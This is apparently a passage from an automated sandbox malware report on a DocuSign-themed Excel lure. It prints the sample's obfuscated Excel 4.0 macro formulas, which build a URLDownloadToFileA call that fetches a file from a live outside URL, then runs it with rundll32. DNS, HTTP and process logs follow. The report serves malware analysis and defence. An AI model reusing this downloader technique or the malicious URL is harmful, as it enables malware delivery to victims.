              "=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,

              Network Behavior

              Network Port Distribution

              TCP Packets

              Timestamp                             Source Port   Dest Port   Source IP       Dest IP
              Feb 20, 2021 02:07:00.020901918 CET   49167         80          192.168.2.22    185.81.0.78
              Feb 20, 2021 02:07:00.079477072 CET   80            49167       185.81.0.78     192.168.2.22
              Feb 20, 2021 02:07:00.079619884 CET   49167         80          192.168.2.22    185.81.0.78
              Feb 20, 2021 02:07:00.080370903 CET   49167         80          192.168.2.22    185.81.0.78
              Feb 20, 2021 02:07:00.139641047 CET   80            49167       185.81.0.78     192.168.2.22
              Feb 20, 2021 02:07:27.539189100 CET   80            49167       185.81.0.78     192.168.2.22
              Feb 20, 2021 02:07:27.539448023 CET   49167         80          192.168.2.22    185.81.0.78
              Feb 20, 2021 02:07:27.539774895 CET   49167         80          192.168.2.22    185.81.0.78
              Feb 20, 2021 02:07:27.597940922 CET   80            49167       185.81.0.78     192.168.2.22

              UDP Packets

              Timestamp                             Source Port   Dest Port   Source IP       Dest IP
              Feb 20, 2021 02:06:59.939125061 CET   52197         53          192.168.2.22    8.8.8.8
              Feb 20, 2021 02:06:59.996273041 CET   53            52197       8.8.8.8         192.168.2.22

              DNS Queries

              Timestamp                             Source IP       Dest IP    Trans ID   OP Code              Name                Type             Class
              Feb 20, 2021 02:06:59.939125061 CET   192.168.2.22    8.8.8.8    0x71dd     Standard query (0)   www.chipmania.it    A (IP address)   IN (0x0001)

              DNS Answers

              Timestamp                             Source IP   Dest IP         Trans ID   Reply Code     Name                CName           Address       Type                     Class
              Feb 20, 2021 02:06:59.996273041 CET   8.8.8.8     192.168.2.22    0x71dd     No error (0)   www.chipmania.it    chipmania.it    -             CNAME (Canonical name)   IN (0x0001)
              Feb 20, 2021 02:06:59.996273041 CET   8.8.8.8     192.168.2.22    0x71dd     No error (0)   chipmania.it        -               185.81.0.78   A (IP address)           IN (0x0001)

              HTTP Request Dependency Graph

              • www.chipmania.it

              HTTP Packets

              Session ID   Source IP       Source Port   Destination IP   Destination Port   Process
              0            192.168.2.22    49167         185.81.0.78      80                 C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              Timestamp                             kBytes transferred   Direction   Data
              Feb 20, 2021 02:07:00.080370903 CET   0                    OUT         GET /mails/open.php HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: www.chipmania.it
              Connection: Keep-Alive


              Code Manipulations

              Statistics

              CPU Usage


              Memory Usage


              High Level Behavior Distribution


              Behavior


              System Behavior

              General

              Start time:02:06:35
              Start date:20/02/2021
              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              Wow64 process (32bit):false
              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Imagebase:0x13fd60000
              File size:27641504 bytes
              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:02:07:06
              Start date:20/02/2021
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32 ..\BASE.BABAA,DllRegisterServer
              Imagebase:0xffb60000
              File size:45568 bytes
              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Disassembly

              Code Analysis
